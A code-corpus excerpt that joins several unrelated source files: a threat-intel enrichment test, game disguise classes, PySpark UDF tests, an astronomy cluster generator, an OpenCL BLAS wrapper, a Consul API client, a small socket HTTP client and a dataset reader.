with mock.patch(target, side_effect=side_effect):
mock_request.side_effect = (
[get_public_key] + [avotx_api_response(HTTPStatus.OK)] * 14
)
response = client.post(any_route,
json=valid_json,
headers=headers(valid_jwt()))
observable_types = {
'domain': 'domain',
'md5': 'file',
'sha1': 'file',
'sha256': 'file',
'ip': 'IPv4',
'ipv6': 'IPv6',
'url': 'url',
}
expected_urls = []
expected_headers = {
'User-Agent': app.config['CTR_USER_AGENT'],
'X-OTX-API-KEY': (
jwt.decode(
valid_jwt(), options={'verify_signature': False}
)['key']
),
}
expected_params_list = []
pulse_id = 'q1w2e3r4t5y6'
for observable in valid_json:
if observable['type'] not in observable_types:
continue
category = observable_types[observable['type']]
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/indicators/{category}/"
f"{quote(observable['value'], safe='@:')}/general"
)
expected_params_list.append({})
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/pulses/{pulse_id}/"
'indicators'
)
expected_params_list.append({
'sort': '-created',
'limit': mock.ANY,
'page': 1,
})
mock_request.assert_has_calls([
mock.call(expected_url,
headers=expected_headers,
params=expected_params)
for expected_url, expected_params
in zip(expected_urls, expected_params_list)
])
if any_route.startswith('/refer'):
response = client.post(any_route, json=valid_json)
assert response is not None, f'Unknown route: {any_route}.'
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
def test_enrich_call_with_external_error_from_avotx_failure(
avotx_api_route, client, valid_json, mock_request, valid_jwt,
get_public_key):
for status_code, error_code, error_message in [
(
HTTPStatus.FORBIDDEN,
'authorization error',
('Authorization failed: '
'Authorization failed on AlienVault OTX side'),
),
(
HTTPStatus.INTERNAL_SERVER_ERROR,
'oops',
'Something went wrong. Reason: '
f'{HTTPStatus.INTERNAL_SERVER_ERROR.value} '
f'{HTTPStatus.INTERNAL_SERVER_ERROR.phrase}.',
),
]:
app = client.application
mock_request.side_effect = [
get_public_key, avotx_api_response(status_code)
]
def shuffle(sequence):
return sample(sequence, len(sequence))
observables = shuffle(valid_json)
response = client.post(avotx_api_route,
json=observables,
headers=headers(valid_jwt()))
observable_types = {
'domain': 'domain',
'md5': 'file',
'sha1': 'file',
'sha256': 'file',
'ip': 'IPv4',
'ipv6': 'IPv6',
'url': 'url',
}
expected_headers = {
'User-Agent': app.config['CTR_USER_AGENT'],
'X-OTX-API-KEY': (
jwt.decode(
valid_jwt(), options={'verify_signature': False}
)['key']
),
}
expected_params = {}
expected_urls = []
for observable in valid_json:
if observable['type'] not in observable_types:
continue
category = observable_types[observable['type']]
expected_urls.append(
f"{app.config['AVOTX_URL']}/api/v1/indicators/{category}/"
f"{quote(observable['value'], safe='@:')}/general"
)
mock_request.assert_has_calls([
mock.call(expected_url,
headers=expected_headers,
params=expected_params)
for expected_url in expected_urls
], any_order=True)
mock_request.reset_mock()
expected_payload = {
'errors': [
{
'code': error_code,
'message': error_message,
'type': 'fatal',
}
]
}
assert response.status_code == HTTPStatus.OK
assert response.get_json() == expected_payload
| 2.34375
| 2
|
typeclasses/disguises/disguises.py
|
sgsabbage/arxcode
| 42
|
12780098
|
<gh_stars>10-100
"""
Disguises and Masks
"""
from typeclasses.wearable.wearable import Wearable, EquipError
from typeclasses.consumable.consumable import Consumable
from world.crafting.craft_data_handlers import MaskDataHandler
from evennia.utils.logger import log_file
class Mask(Wearable):
"""
Wearable mask that replaces name with 'Someone wearing <short desc> mask'.
Also grants a temp_desc. Charges equal to quality, loses a charge when worn.
"""
item_data_class = MaskDataHandler
def at_object_creation(self):
"""
Run at Wearable creation.
"""
self.is_worn = False
def at_post_remove(self, wearer):
"""Hook called after removing succeeds."""
self.remove_mask(wearer)
super(Mask, self).at_post_remove(wearer)
def at_pre_wear(self, wearer):
"""Hook called before wearing for any checks."""
super(Mask, self).at_pre_wear(wearer)
if self.item_data.quality_level == 0:
raise EquipError("needs repair")
def at_post_wear(self, wearer):
"""Hook called after wearing succeeds."""
self.log_mask(wearer)
self.wear_mask(wearer)
if wearer.item_data.additional_desc:
wearer.msg(
"{yYou currently have a +tempdesc set, which you may want to remove with +tempdesc.{n"
)
super(Mask, self).at_post_wear(wearer)
def log_mask(self, wearer):
"""Logging players using masks to keep track of shennigans"""
log_file(
f"{wearer} ({wearer.id}) put on {self} ({self.id})", "player_masks.log"
)
def wear_mask(self, wearer):
"""Change the visible identity of our wearer."""
wearer.db.mask = self
wearer.fakename = "Someone wearing %s" % self
wearer.temp_desc = self.item_data.mask_desc
def remove_mask(self, wearer):
"""Restore the visible identity of our wearer."""
wearer.attributes.remove("mask")
del wearer.fakename
del wearer.temp_desc
wearer.msg("%s is no longer altering your identity or description." % self)
class DisguiseKit(Consumable):
"""
morestoof
"""
def check_target(self, target, caller):
"""
Determines if a target is valid.
"""
from evennia.utils.utils import inherits_from
return inherits_from(target, self.valid_typeclass_path)
| 2.625
| 3
|
pysparktestingexample/tests/test_udf_dict_arg.py
|
zhangabner/pyspark-debug-test
| 0
|
12780099
|
<filename>pysparktestingexample/tests/test_udf_dict_arg.py
import pytest
import pyspark.sql.functions as F
from pyspark.sql.types import *
# @F.udf(returnType=StringType())
# def state_abbreviation(s, mapping):
# if s is not None:
# return mapping[s]
# def test_udf_dict_failure(spark):
# df = spark.createDataFrame([
# ['Alabama',],
# ['Texas',],
# ['Antioquia',]
# ]).toDF('state')
# mapping = {'Alabama': 'AL', 'Texas': 'TX'}
# df.withColumn('state_abbreviation', state_abbreviation(F.col('state'), spark.sparkContext.broadcast(mapping))).show()
# def working_fun(mapping_broadcasted):
# def f(x):
# return mapping_broadcasted.value.get(x)
# return F.udf(f)
# def test_udf_dict_working(spark):
# df = spark.createDataFrame([
# ['Alabama',],
# ['Texas',],
# ['Antioquia',]
# ]).toDF('state')
# mapping = {'Alabama': 'AL', 'Texas': 'TX'}
# b = spark.sparkContext.broadcast(mapping)
# df.withColumn('state_abbreviation', working_fun(b)(F.col('state'))).show()
### CODE FOR A SO QUESTION
# keyword_list= [
# ['union','workers','strike','pay','rally','free','immigration',],
# ['farmer','plants','fruits','workers'],
# ['outside','field','party','clothes','fashions']]
# def label_maker_topic(tokens, topic_words_broadcasted):
# twt_list = []
# for i in range(0, len(topic_words_broadcasted.value)):
# count = 0
# #print(topic_words[i])
# for tkn in tokens:
# if tkn in topic_words_broadcasted.value[i]:
# count += 1
# twt_list.append(count)
# return twt_list
# # def make_topic_word(topic_words):
# # return F.udf(lambda c: label_maker_topic(c, topic_words))
# def make_topic_word_better(topic_words_broadcasted):
# def f(c):
# return label_maker_topic(c, topic_words_broadcasted)
# return F.udf(f)
# def test_udf_list(spark):
# df = spark.createDataFrame([["union",], ["party",]]).toDF("tokens")
# b = spark.sparkContext.broadcast(keyword_list)
# df.withColumn("topics", make_topic_word_better(b)(F.col("tokens"))).show()
## CODE FOR THIS SO QUESTION: https://stackoverflow.com/questions/53052891/pass-a-dictionary-to-pyspark-udf
# def stringToStr_function(checkCol, dict1_broadcasted) :
# for key, value in dict1.iteritems() :
# if(checkCol != None and checkCol==key): return value
# stringToStr_udf = udf(stringToStr_function, StringType())
# def stringToStr(dict1_broadcasted):
# def f(x):
# return dict1_broadcasted.value.get(x)
# return F.udf(f)
# def test_fetch_from_dict(spark):
# df = spark.createDataFrame([["REQUEST",], ["CONFIRM",]]).toDF("status")
# df.show()
# b = spark.sparkContext.broadcast({"REQUEST": "Requested", "CONFIRM": "Confirmed", "CANCEL": "Cancelled"})
# df.withColumn(
# "new_col",
# stringToStr(b)(F.col("status"))
# ).show()
def add_descriptions(dict_b):
def f(x):
return dict_b.value.get(x)
return F.udf(f)
def test_add_descriptions(spark):
df = spark.createDataFrame([[1,], [2,], [3,]]).toDF("some_num")
dictionary= { 1:'A' , 2:'B' }
dict_b = spark.sparkContext.broadcast(dictionary)
df.withColumn(
"res",
add_descriptions(dict_b)(F.col("some_num"))
).show()
| 2.5
| 2
|
create_art_cluster_DAO.py
|
tbitsakis/astro_projects
| 2
|
12780100
|
<filename>create_art_cluster_DAO.py
#! /usr/bin/python
'''
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
PURPOSE:
The code creates artificial clusters from the theoretical isochrones of Bruzual&Charlot and
then saves a table that will be used as an input for DAOPHOT>addstar to create an artificial
image of a cluster.
INPUTS:
Provide the isochrone file and the path to that directory. Also the bands and the number of
stars.
OUTPUTS:
A table containing coordinates and magnitudes
DEPENDENCIES:
Numpy
HISTORY:
Created by: <NAME> (Instituto de Radioastronomia y Astrofisica/UNAM, Mexico)
MODIFICATIONS:
None
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
'''
import numpy as np
import sys, operator, time, glob
from math import pi, log, e
import random
import matplotlib.pyplot as plt
import cosmolopy.luminosityfunction as LumF
# #################################################################################################
# ################################### EDIT BELOW THIS POINT #######################################
# #################################################################################################
# ISOCHRONE FILE ==================================================================================
print ' '
IsochronesPath = "/Users/TB/Documents/Astro_Work/Studying_StarClusters/Data/LMC/Analysis/8_Fit_CMDs/all_isochrones/my_isoc_random_5k/"
IsochroneFile_B1 = input('Isochrone, 1-band (1:U, 2:B, 3:V, 4:I): ') # column that corresponds to 1-band
IsochroneFile_B2 = input('Isochrone, 1-band (1:U, 2:B, 3:V, 4:I): ') # column that corresponds to 2-band
DistModulus = 18.5 # Distance Modulus of our galaxy
IsochroneFile = raw_input('Please provide the desirable isochrone file: ')
numberStars = input('Please provide the number of stars in the artificial cluster: ')
imageSize = [200,200]
# =================================================================================================
print ' '
print '================================= Running ======================================'
# #################################################################################################
# ################################ DO NOT EDIT BELOW THIS POINT ###################################
# #################################################################################################
start_time = time.time()
# ##################### Retrieve all theoretical values from isochrones files #####################
isochrones_list = sorted(glob.glob(IsochronesPath))
B1_Total = []
B2_Total = []
ColmagTotal = []
dataIndex = []
IsochroneFile_path = IsochronesPath+IsochroneFile
B1, B2 = np.loadtxt(IsochroneFile_path, comments='#', unpack=True,
usecols=(IsochroneFile_B1,IsochroneFile_B2))
B1_Total = B1+DistModulus # Adding distance modulus to modify generic isochrone mags to desirable redshift
B2_Total = B2+DistModulus # Adding distance modulus to modify generic isochrone mags to desirable redshift
ColmagTotal.extend(B1-B2) # ISOCHRONE COLOUR - no need to add distance modulus
for i in range(len(B1_Total)):
dataIndex.append(i)
# # ############################### Create random catalog of N-stars ################################
indexList = random.sample(dataIndex,numberStars) # Randomly choses numberStars elements from the dataIndex array
B2_artStar = np.take(B2_Total,indexList) # Choses the B2 with corresponding index
Col_artStar = np.take(ColmagTotal,indexList) # Choses the Colour with corresponding index
mu = [imageSize[0]/2.,imageSize[1]/2.] # mean value of the two axis of image
sigma = imageSize[0]/8. # sigma value (the smallest axis fraction)
PosX=[]
PosY=[]
for i in range(numberStars):
PosX.append(random.gauss(mu[0],sigma)) # gaussian random for x
PosY.append(random.gauss(mu[1],sigma)) # gaussian random for y
# ######################################## Saving Results ###########################################
if IsochroneFile_B1 == 1 and IsochroneFile_B2 == 2:
filt = 'UB'
elif IsochroneFile_B1 == 1 and IsochroneFile_B2 == 3:
filt = 'UV'
elif IsochroneFile_B1 == 2 and IsochroneFile_B2 == 3:
filt = 'BV'
elif IsochroneFile_B1 == 3 and IsochroneFile_B2 == 4:
filt = 'VI'
else:
filt = 'NaN'
print 'Saving Results!'
save_file = 'Artificial_Clusters/'+IsochroneFile+'_'+filt+'_'+str(numberStars)+'_clust.cat'
file = open(save_file,'w')
file.write('# x_pixel y_pixel Mag '+filt+'\n')
for i1, i2, i3, i4 in zip(PosX,PosY,B2_artStar,Col_artStar):
file.write('{} {} {} {}\n'.format(i1,i2,i3,i4))
# ################################# Plotting the Luminosity Function ################################
print 'Plotting!'
plt.figure(1)
area = (22.-B2_artStar)*5
plt.scatter(PosX,PosY,s=area)
# plt.plot(x_s,y_s,label="Schechter function")
plt.xlim(0,imageSize[0])
plt.ylim(0,imageSize[1])
# # plt.yscale('log', nonposy='clip')
plt.xlabel('x [pixel]',fontsize=16)
plt.ylabel('y [pixel]',fontsize=16)
# plt.legend()
name_eps = 'Artificial_Clusters/'+IsochroneFile+'_'+filt+'_'+str(numberStars)+'_clust.eps'
plt.savefig(name_eps,format='eps')
# Plotting the CMD
plt.figure(2)
plt.scatter(Col_artStar,B2_artStar)
plt.xlabel(filt,fontsize=16)
plt.ylabel('m [mag]',fontsize=16)
plt.ylim(22,13)
plt.show()
print '================================== END ========================================'
print("--- %s seconds ---" % (time.time() - start_time))
print ' '
| 3.09375
| 3
|
output/models/ms_data/particles/particles_ec020_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12780101
|
from output.models.ms_data.particles.particles_ec020_xsd.particles_ec020 import Doc
__all__ = [
"Doc",
]
| 0.996094
| 1
|
veles/ocl_blas.py
|
AkshayJainG/veles
| 1,007
|
12780102
|
# -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Apr 13, 2015
BLAS class to use with ocl backend.
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
from cuda4py.blas import CUBLAS_OP_N, CUBLAS_OP_T
import numpy
import opencl4py.blas as clblas
import os
import threading
import weakref
from zope.interface import implementer
from veles.accelerated_units import AcceleratedUnit, IOpenCLUnit
from veles.config import root
from veles.dummy import DummyWorkflow
from veles.logger import Logger
from veles.numpy_ext import roundup
@implementer(IOpenCLUnit)
class Builder(AcceleratedUnit):
"""Dummy unit for building OpenCL kernels.
"""
def __init__(self, workflow, **kwargs):
super(Builder, self).__init__(workflow, **kwargs)
self.source = kwargs["source"]
self.defines = kwargs["defines"]
self.kernel_name = kwargs["kernel_name"]
self.cache_file_name = kwargs["cache_file_name"]
self.dtype = kwargs["dtype"]
@property
def kernel(self):
return self._kernel_
def ocl_init(self):
self.sources_[self.source] = {}
self.build_program(self.defines, self.cache_file_name, self.dtype)
self.assign_kernel(self.kernel_name)
def ocl_run(self):
pass
class OCLBLAS(Logger):
"""Class with BLAS functionality similar to CUBLAS.
It uses CLBLAS when available or custom kernels otherwise.
"""
@staticmethod
def attach_to_device(device):
if device.blas is None:
device.blas = OCLBLAS(device)
def __init__(self, device):
super(OCLBLAS, self).__init__()
self._lock_ = threading.Lock()
self._device = weakref.ref(device)
self.kernels = {}
self._const_i = numpy.zeros(3, dtype=numpy.uint64)
try:
if (root.common.engine.ocl.clBLAS is not True or
root.common.engine.precision_level > 0):
raise ValueError()
if "CLBLAS_STORAGE_PATH" not in os.environ:
found = False
for dirnme in root.common.engine.device_dirs:
for path, _, files in os.walk(dirnme):
for f in files:
if f.endswith(".kdb"):
found = True
os.environ["CLBLAS_STORAGE_PATH"] = path
break
if found:
break
if found:
break
self.blas = clblas.CLBLAS()
self._sgemm = self.clblas_sgemm
self._dgemm = self.clblas_dgemm
self.debug("Using clBLAS for matrix multiplication")
except (OSError, RuntimeError, ValueError):
self._sgemm = self.veles_gemm
self._dgemm = self.veles_gemm
self.debug("Using Veles OpenCL kernels for matrix multiplication")
@property
def device(self):
return self._device()
@staticmethod
def gemm(dtype):
if dtype == numpy.float32:
return OCLBLAS.sgemm
if dtype == numpy.float64:
return OCLBLAS.dgemm
raise ValueError("Invalid dtype %s" % dtype)
def sgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
return self._sgemm(
transA, transB, rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def dgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
return self._dgemm(
transA, transB, rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def clblas_sgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using clBLAS.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
Single precision (float) version.
"""
self.blas.sgemm((self.device.queue_,), clblas.clblasColumnMajor,
transA, transB, rowsCountA, columnCountB,
commonSideLength, alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def clblas_dgemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using clBLAS.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
Double precision (double) version.
"""
self.blas.dgemm((self.device.queue_,), clblas.clblasColumnMajor,
transA, transB, rowsCountA, columnCountB,
commonSideLength, alpha, A, B, beta, C,
offsetA=offsetA, offsetB=offsetB, offsetC=offsetC)
def veles_gemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA=0, offsetB=0, offsetC=0):
"""Does a matrix multiplication like in CUBLAS using custom kernel.
Matricies are assumed to be tightly packed and stored like in CUBLAS.
"""
with self._lock_:
self._veles_gemm(transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA, offsetB, offsetC)
def _veles_gemm(self, transA, transB,
rowsCountA, columnCountB, commonSideLength,
alpha, A, B, beta, C, offsetA, offsetB, offsetC):
dtype = alpha.dtype
key = (transA, transB, rowsCountA, columnCountB, commonSideLength,
dtype)
krn_info = self.kernels.get(key)
if krn_info is None:
block_size, vector_opt = self.device.device_info.get_kernel_bs_vo(
kernel="matrix_multiplication", dtype=dtype)
defines = {
"BLOCK_SIZE": block_size,
"VECTOR_OPT": int(bool(vector_opt)),
"B_WIDTH": rowsCountA,
"A_WIDTH": columnCountB,
"AB_COMMON": commonSideLength
}
if transB == CUBLAS_OP_T:
defines["A_COL"] = 1
else:
assert transB == CUBLAS_OP_N
if transA == CUBLAS_OP_N:
defines["B_COL"] = 1
else:
assert transA == CUBLAS_OP_T
global_size = (roundup(rowsCountA, block_size),
roundup(columnCountB, block_size))
local_size = (block_size, block_size)
w = DummyWorkflow()
builder = Builder(
w, source="gemm", defines=defines, kernel_name="gemm",
cache_file_name=(
"veles_gemm_%s" % "_".join(str(x) for x in key)),
dtype=dtype)
builder.initialize(self.device)
krn_info = (builder.kernel, global_size, local_size)
self.kernels[key] = krn_info
del builder
del w
# Set the constants and execute the kernel
krn = krn_info[0]
self._const_i[0:3] = offsetA, offsetB, offsetC
# Our kernel stores output in row-major order, so swap A and B
krn.set_args(B, A, C, alpha, beta, self._const_i[1:2],
self._const_i[0:1], self._const_i[2:3])
global_size = krn_info[1]
local_size = krn_info[2]
self.device.queue_.execute_kernel(krn, global_size, local_size,
need_event=False)
| 1.734375
| 2
|
prez/models/spaceprez/spaceprez_feature_collection_list.py
|
surroundaustralia/Prez
| 2
|
12780103
|
from typing import List
class SpacePrezFeatureCollectionList(object):
def __init__(self, sparql_response: List) -> None:
self.dataset = {
"id": None,
"title": None
}
self.members = []
for result in sparql_response:
if self.dataset["id"] is None:
self.dataset["id"] = result["d_id"]["value"]
if self.dataset["title"] is None:
self.dataset["title"] = result["d_label"]["value"]
self.members.append({
"uri": result["coll"]["value"],
"title": result["label"]["value"],
"id": result["id"]["value"],
"desc": result["desc"].get("value") if result.get("desc") else None,
"link": f"/dataset/{self.dataset['id']}/collections/{result.get('id').get('value')}",
"members": f"/dataset/{self.dataset['id']}/collections/{result.get('id').get('value')}/items",
})
self.members.sort(key=lambda m: m["title"])
def get_feature_collection_flat_list(self):
feature_collection_list = []
for mem in self.members:
feature_collection_list.append(
{
"uri": mem["uri"],
"prefLabel": mem["title"],
}
)
return sorted(feature_collection_list, key=lambda c: c["prefLabel"])
| 2.546875
| 3
|
agent/consul_api.py
|
Suremaker/consul-deployment-agent
| 6
|
12780104
|
# Copyright (c) Trainline Limited, 2016-2017. All rights reserved. See LICENSE.txt in the project root for license information.
import base64, json, logging, requests
from retrying import retry
class ConsulError(RuntimeError):
pass
def handle_connection_error(func):
def handle_error(*args, **kwargs):
try:
return func(*args, **kwargs)
except requests.exceptions.ConnectionError as e:
logging.exception(e)
raise ConsulError('Failed to establish connection with Consul HTTP API. Check that Consul agent is running.')
return handle_error
def retry_if_connection_error(exception):
return isinstance(exception, requests.exceptions.ConnectionError)
class ConsulApi(object):
def __init__(self, consul_config):
self._config = consul_config
self._base_url = '{0}://{1}:{2}/{3}'.format(self._config['scheme'], self._config['host'], self._config['port'], self._config['version'])
self._last_known_modify_index = 0
@handle_connection_error
@retry(retry_on_exception=retry_if_connection_error, wait_exponential_multiplier=1000, wait_exponential_max=60000)
def _api_get(self, relative_url):
url = '{0}/{1}'.format(self._base_url, relative_url)
logging.debug('Consul HTTP API request: {0}'.format(url))
response = requests.get(url, headers={'X-Consul-Token': self._config['acl_token']})
logging.debug('Response status code: {0}'.format(response.status_code))
logging.debug('Response content: {0}'.format(response.text))
if response.status_code == 500:
raise ConsulError('Consul HTTP API internal error. Response content: {0}'.format(response.text))
return response
@handle_connection_error
@retry(retry_on_exception=retry_if_connection_error, wait_exponential_multiplier=1000, wait_exponential_max=60000)
def _api_put(self, relative_url, content):
url = '{0}/{1}'.format(self._base_url, relative_url)
logging.debug('Consul HTTP API PUT request URL: {0}'.format(url))
logging.debug('Consul HTTP API PUT request content: {0}'.format(content))
response = requests.put(url, data=content, headers={'X-Consul-Token': self._config['acl_token']})
logging.debug('Response status code: {0}'.format(response.status_code))
logging.debug('Response content: {0}'.format(response.text))
if response.status_code == 500:
raise ConsulError('Consul HTTP API internal error. Response content: {0}'.format(response.text))
return response
@retry(wait_fixed=5000, stop_max_attempt_number=12)
def _get_modify_index(self, key, for_write_operation):
logging.debug('Retrieving Consul key-value store modify index for key: {0}'.format(key))
response = self._api_get('kv/{0}?index'.format(key))
# For new values modify_index == 0
if response.status_code == 404 and for_write_operation == True:
modify_index = 0
else:
modify_index = response.headers.get('X-Consul-Index')
logging.debug('Consul key-value store modify index for key \'{0}\': {1}'.format(key, modify_index))
return modify_index
def check_connectivity(self):
logging.info('Checking Consul HTTP API connectivity')
self._api_get('agent/self')
logging.info('Consul HTTP API connectivity OK ')
def get_keys(self, key_prefix):
def decode():
return response.json()
def not_found():
logging.warning('Consul key-value store does not contain key prefix \'{0}\''.format(key_prefix))
return []
response = self._api_get('kv/{0}?keys'.format(key_prefix))
cases = {200: decode, 404: not_found}
return cases[response.status_code]()
def get_service_catalogue(self):
response = self._api_get('agent/services')
return response.json()
def get_value(self, key):
def decode():
values = response.json()
for value in values:
value['Value'] = json.loads(base64.b64decode(value['Value']))
return values[0].get('Value')
def not_found():
logging.warning('Consul key-value store does not contain a value for key \'{0}\''.format(key))
return None
response = self._api_get('kv/{0}'.format(key))
cases = {200: decode, 404: not_found}
return cases[response.status_code]()
def key_exists(self, key):
return self.get_value(key) is not None
def deregister_check(self, id):
response = self._api_put('agent/check/deregister/{0}'.format(id), {})
return response.status_code == 200
def register_http_check(self, service_id, id, name, url, interval, tls_skip_verify=False):
response = self._api_put('agent/check/register', json.dumps({'ServiceID': service_id, 'ID': id, 'Name': name, 'HTTP': url, 'TLSSkipVerify': tls_skip_verify, 'Interval': interval}))
return response.status_code == 200
def register_script_check(self, service_id, id, name, script_path, interval):
response = self._api_put('agent/check/register', json.dumps({'ServiceID': service_id, 'ID': id, 'Name': name, 'Script': script_path, 'Interval': interval}))
return response.status_code == 200
def register_service(self, id, name, address, port, tags):
response = self._api_put('agent/service/register', json.dumps({'ID': id, 'Name': name, 'Address': address, 'Port': port, 'Tags': tags}))
return response.status_code == 200
def wait_for_change(self, key_prefix):
modify_index = self._get_modify_index(key_prefix, False)
if modify_index is None:
self._last_known_modify_index = modify_index
#raise ConsulError('Modify index is invalid.')
if self._last_known_modify_index is None:
logging.info('There may be changes that have not been processed yet, skipping blocking query.')
self._last_known_modify_index = modify_index
return
self._last_known_modify_index = modify_index
logging.debug('Blocking query to Consul HTTP API to wait for changes in the \'{0}\' key space...'.format(key_prefix))
# TODO: Timeout by default is 5 minutes. This can be changed by adding wait=10s or wait=10m to the query string
self._api_get('kv/{0}?index={1}'.format(key_prefix, self._last_known_modify_index))
def write_value(self, key, value):
modify_index = self._get_modify_index(key, True)
response = self._api_put('kv/{0}?cas={1}'.format(key, modify_index), json.dumps(value))
return response.text == 'true'
| 1.96875
| 2
|
others/tcptest/tcpconnector.py
|
1067511899/tornado-learn
| 1
|
12780105
|
import argparse, socket
from time import sleep, time, localtime, strftime
import time
import logging
import sys
import trace
fhand = logging.FileHandler('new20180321.log', mode='a', encoding='GBK')
logging.basicConfig(level=logging.DEBUG, # 控制台打印的日志级别
handlers=[fhand],
format=
'%(asctime)s - %(levelname)s: %(message)s'
# 日志格式
)
def recvall(sock, length):
data = b''
while len(data) < length:
more = sock.recv(length - len(data))
if not more:
raise EOFError('was expecting %d bytes but only received %d bytes before the socket closed'
% (length, len(data)))
data += more
return data
header = '''
GET / HTTP/1.1\r\n
Host: 192.168.1.157:8000\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n
DNT: 1\r\n
Accept-Encoding: gzip, deflate\r\n
Accept-Language: zh-CN,zh;q=0.9\r\n
If-None-Match: "15e84b11ce57dec1b9483884f4e5587e71d5c201"\r\n
\r\n
'''
CRLF = "\r\n\r\n"
def client(host, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
print('Client has been assigned socket name', sock.getsockname())
sock.send((header).encode())
print(header.encode())
reply = recvall(sock, 160)
print('reply', repr(reply))
sock.close()
def main():
print(strftime("%Y-%m-%d %H:%M:%S", localtime(time.time())))
try:
# client('172.16.17.32', 80)
client('192.168.1.157', 8000)
except Exception as e:
print(e)
logging.info(e)
if __name__ == '__main__':
print(strftime("%Y-%m-%d %H:%M:%S", localtime(time.time())))
client('https://www.baidu.com', 443)
| 2.375
| 2
|
Inprocessing/Thomas/Python/baselines/POEM/DatasetReader.py
|
maliha93/Fairness-Analysis-Code
| 9
|
12780106
|
<reponame>maliha93/Fairness-Analysis-Code<gh_stars>1-10
import numpy
import os.path
import scipy.sparse
import sklearn.datasets
import sklearn.decomposition
import sklearn.preprocessing
import sys
class DatasetReader:
def __init__(self, copy_dataset, verbose):
self.verbose = verbose
if copy_dataset is None:
self.trainFeatures = None
self.trainLabels = None
self.testFeatures = None
self.testLabels = None
else:
if copy_dataset.trainFeatures is not None:
self.trainFeatures = copy_dataset.trainFeatures.copy()
else:
self.trainFeatures = None
if copy_dataset.trainLabels is not None:
self.trainLabels = copy_dataset.trainLabels.copy()
else:
self.trainLabels = None
if copy_dataset.testFeatures is not None:
self.testFeatures = copy_dataset.testFeatures
else:
self.testFeatures = None
if copy_dataset.testLabels is not None:
self.testLabels = copy_dataset.testLabels
else:
self.testLabels = None
def freeAuxiliaryMatrices(self):
if self.trainFeatures is not None:
del self.trainFeatures
del self.trainLabels
del self.testFeatures
del self.testLabels
if self.verbose:
print("DatasetReader: [Message] Freed matrices")
sys.stdout.flush()
def reduceDimensionality(self, numDims):
if (self.trainFeatures is None) and self.verbose:
print("DatasetReader: [Error] No training data loaded.")
sys.stdout.flush()
return
LSAdecomp = sklearn.decomposition.TruncatedSVD(n_components = numDims, algorithm = 'arpack')
LSAdecomp.fit(self.trainFeatures)
self.trainFeatures = LSAdecomp.transform(self.trainFeatures)
self.testFeatures = LSAdecomp.transform(self.testFeatures)
if self.verbose:
print("DatasetReader: [Message] Features now have shape: Train:",\
numpy.shape(self.trainFeatures), "Test:", numpy.shape(self.testFeatures))
sys.stdout.flush()
def sanitizeLabels(self, labelList):
returnList = []
for tup in labelList:
if -1 in tup:
returnList.append(())
else:
returnList.append(tup)
return returnList
def loadDataset(self, corpusName, labelSubset = None):
trainFilename = '../DATA/%s_train.svm' % corpusName
testFilename = '../DATA/%s_test.svm' % corpusName
if (not os.path.isfile(trainFilename)) or (not os.path.isfile(testFilename)):
print("DatasetReader: [Error] Invalid corpus name ", trainFilename, testFilename)
sys.stdout.flush()
return
labelTransform = sklearn.preprocessing.MultiLabelBinarizer(sparse_output = False)
train_features, train_labels = sklearn.datasets.load_svmlight_file(trainFilename,
dtype = numpy.longdouble, multilabel = True)
sanitized_train_labels = self.sanitizeLabels(train_labels)
numSamples, numFeatures = numpy.shape(train_features)
biasFeatures = scipy.sparse.csr_matrix(numpy.ones((numSamples, 1),
dtype = numpy.longdouble), dtype = numpy.longdouble)
self.trainFeatures = scipy.sparse.hstack([train_features, biasFeatures], dtype = numpy.longdouble)
self.trainFeatures = self.trainFeatures.tocsr()
test_features, test_labels = sklearn.datasets.load_svmlight_file(testFilename,
n_features = numFeatures, dtype = numpy.longdouble, multilabel = True)
sanitized_test_labels = self.sanitizeLabels(test_labels)
